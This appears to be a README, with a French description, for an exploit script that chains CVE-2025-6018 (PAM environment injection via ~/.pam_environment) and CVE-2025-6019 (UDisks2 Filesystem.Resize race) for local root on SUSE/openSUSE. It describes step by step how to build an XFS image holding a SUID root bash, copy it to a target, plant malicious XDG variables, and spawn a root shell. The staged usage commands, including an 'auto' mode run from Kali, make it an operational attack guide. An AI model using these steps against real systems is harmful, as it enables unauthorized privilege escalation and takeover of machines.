
Exploit Chain of CVE-2025-6018 to CVE-2025-6019
https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt
Cette exploit enchaîne CVE-2025-6018 et CVE-2025-6019 pour réaliser une élévation de privilèges locale d’un utilisateur non privilégié à root sur les systèmes SUSE/openSUSE vulnérables. CVE-2025-6018 est une vulnérabilité d’injection de variables d’environnement dans PAM (Pluggable Authentication Modules) dans pam_env.so (versions 1.3.0-1.6.0) qui permet à un utilisateur d’empoisonner son environnement de session via ~/.pam_environment en utilisant la directive OVERRIDE. En manipulant les variables de session XDG (XDG_SEAT, XDG_VTNR, XDG_SESSION_TYPE), un attaquant peut tromper systemd-logind pour lui accorder les privilèges allow_active de PolicyKit, faisant apparaître la session SSH distante comme une session physique locale. Une fois le statut allow_active obtenu, CVE-2025-6019 peut être exploitée : cette vulnérabilité dans UDisks2/libblockdev permet aux utilisateurs disposant des permissions allow_active de monter des systèmes de fichiers avec des options privilégiées (exec, suid) via une condition de concurrence dans la méthode D-Bus Filesystem.Resize. Lorsqu’une opération de redimensionnement est déclenchée sur un périphérique loop contenant un système de fichiers XFS contrefait avec un binaire bash SUID root, libblockdev monte automatiquement le système de fichiers pour effectuer le redimensionnement, mais échoue à le démonter en raison de l’erreur de redimensionnement, laissant le bash SUID accessible dans /tmp/blockdev*/, qui peut alors être exécuté pour obtenir un shell root.
sudo ./ExploitChain.sh stage1 [output_path]
# Default: ./xfs.image
# Creates 300MB XFS filesystem with SUID root bash
scp xfs.image user@<target_ip>:/tmp/
./ExploitChain.sh stage2
# Creates ~/.pam_environment with malicious XDG variables
# MUST logout and login to trigger PAM processing
logout
ssh user@<target_ip>
# PAM processes ~/.pam_environment on login
# systemd-logind grants allow_active status
./ExploitChain.sh stage3 /tmp/xfs.image
# Exploits UDisks2 Filesystem.Resize bug
# Mounts XFS image with SUID bash
# Spawns root shell
# On Kali (auto-detects root and runs stage1)
sudo ./Exploit-6018-Chain-6019-v3.sh auto
# On target (auto-detects stage and runs stage2/stage3)
./ExploitChain.sh auto /tmp/xfs.image
./ExploitChain.sh help